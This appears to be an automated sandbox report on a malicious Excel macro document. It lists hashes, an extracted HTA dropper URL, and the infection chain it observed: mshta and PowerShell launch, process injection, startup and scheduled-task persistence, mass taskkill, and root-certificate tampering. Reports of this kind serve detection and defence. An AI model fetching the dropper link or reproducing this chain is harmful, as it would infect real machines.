038214d4fc146d3a0b09db57ab584e3cef198a466d82206a03af0ca6aff4ac2e

General

Target

bb37e159_by_Libranalysis.xlsm
Size

15KB
MD5

bb37e1592a9611dc521167ac5a2034a2
SHA1

a9a1e60803fcb5a0b68659195ce5d0c15455646b
SHA256

038214d4fc146d3a0b09db57ab584e3cef198a466d82206a03af0ca6aff4ac2e
SHA512

ddfa6ba01694e9a9e7355cb4ce2db69d3aaee908180a1bce066b382c02f5bf938bbd21240df7e0aa505fed64a440d420cecb11736e2855a3fee4589342b31a49

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.j.mp/jasidjalsdjlijlijasd

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exePowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1528	2020	mshta.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2336	Powershell.exe

Blocklisted process makes network request 20 IoCs

Processes:

mshta.exeWScript.exePowershell.exe

flow	pid	process
6	1528	mshta.exe
8	1528	mshta.exe
10	1528	mshta.exe
12	1528	mshta.exe
14	1528	mshta.exe
15	1528	mshta.exe
17	1528	mshta.exe
19	1528	mshta.exe
20	1528	mshta.exe
23	2056	WScript.exe
26	1528	mshta.exe
27	1528	mshta.exe
29	1528	mshta.exe
30	1528	mshta.exe
31	1528	mshta.exe
33	1528	mshta.exe
35	2056	WScript.exe
36	1528	mshta.exe
38	2056	WScript.exe
41	2576	Powershell.exe

Executes dropped EXE 1 IoCs

Processes:

lulupupugugugagachuchui.txt

pid process

2200 lulupupugugugagachuchui.txt
Drops startup file 1 IoCs

Processes:

aspnet_compiler.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk aspnet_compiler.exe
Loads dropped DLL 1 IoCs

Processes:

WScript.exe

pid process

2056 WScript.exe

pid	process
2200	lulupupugugugagachuchui.txt

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe

pid	process
2056	WScript.exe

Drops file in System32 directory 1 IoCs

Processes:

Powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Powershell.exe

description pid process target process

PID 2576 set thread context of 2584 2576 Powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2692 schtasks.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	pid	process	target process
PID 2576 set thread context of 2584	2576	Powershell.exe	aspnet_compiler.exe

pid	process
2692	schtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1752	taskkill.exe
2392	taskkill.exe
2408	taskkill.exe
316	taskkill.exe
1704	taskkill.exe
1792	taskkill.exe
908	taskkill.exe
1732	taskkill.exe
2384	taskkill.exe
2420	taskkill.exe
2484	taskkill.exe
2512	taskkill.exe
1016	taskkill.exe
2376	taskkill.exe
2348	taskkill.exe
2444	taskkill.exe
2428	taskkill.exe
2520	taskkill.exe
2460	taskkill.exe
2436	taskkill.exe
2500	taskkill.exe
2528	taskkill.exe
916	taskkill.exe
1652	taskkill.exe
2472	taskkill.exe
2492	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEmshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\TypeLib\{F81EFBBE-934B-4AA7-AF51-926EA60E9084}\2.0\HELPDIR	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F81EFBBE-934B-4AA7-AF51-926EA60E9084}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\TypeLib\{F81EFBBE-934B-4AA7-AF51-926EA60E9084}\2.0\FLAGS	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\TypeLib\{F81EFBBE-934B-4AA7-AF51-926EA60E9084}\2.0\0	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2020 EXCEL.EXE

pid	process
2020	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

Powershell.exe

pid	process
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe
2576	Powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exePowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	908	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	2576	Powershell.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	2528	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeDebugPrivilege	2436	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2576	Powershell.exe
Token: SeSecurityPrivilege	2576	Powershell.exe
Token: SeTakeOwnershipPrivilege	2576	Powershell.exe
Token: SeLoadDriverPrivilege	2576	Powershell.exe
Token: SeSystemProfilePrivilege	2576	Powershell.exe
Token: SeSystemtimePrivilege	2576	Powershell.exe
Token: SeProfSingleProcessPrivilege	2576	Powershell.exe
Token: SeIncBasePriorityPrivilege	2576	Powershell.exe
Token: SeCreatePagefilePrivilege	2576	Powershell.exe
Token: SeBackupPrivilege	2576	Powershell.exe
Token: SeRestorePrivilege	2576	Powershell.exe
Token: SeShutdownPrivilege	2576	Powershell.exe
Token: SeDebugPrivilege	2576	Powershell.exe
Token: SeSystemEnvironmentPrivilege	2576	Powershell.exe
Token: SeRemoteShutdownPrivilege	2576	Powershell.exe
Token: SeUndockPrivilege	2576	Powershell.exe
Token: SeManageVolumePrivilege	2576	Powershell.exe
Token: 33	2576	Powershell.exe
Token: 34	2576	Powershell.exe
Token: 35	2576	Powershell.exe
Token: SeIncreaseQuotaPrivilege	2576	Powershell.exe
Token: SeSecurityPrivilege	2576	Powershell.exe
Token: SeTakeOwnershipPrivilege	2576	Powershell.exe
Token: SeLoadDriverPrivilege	2576	Powershell.exe
Token: SeSystemProfilePrivilege	2576	Powershell.exe
Token: SeSystemtimePrivilege	2576	Powershell.exe
Token: SeProfSingleProcessPrivilege	2576	Powershell.exe
Token: SeIncBasePriorityPrivilege	2576	Powershell.exe
Token: SeCreatePagefilePrivilege	2576	Powershell.exe
Token: SeBackupPrivilege	2576	Powershell.exe
Token: SeRestorePrivilege	2576	Powershell.exe
Token: SeShutdownPrivilege	2576	Powershell.exe
Token: SeDebugPrivilege	2576	Powershell.exe
Token: SeSystemEnvironmentPrivilege	2576	Powershell.exe
Token: SeRemoteShutdownPrivilege	2576	Powershell.exe
Token: SeUndockPrivilege	2576	Powershell.exe
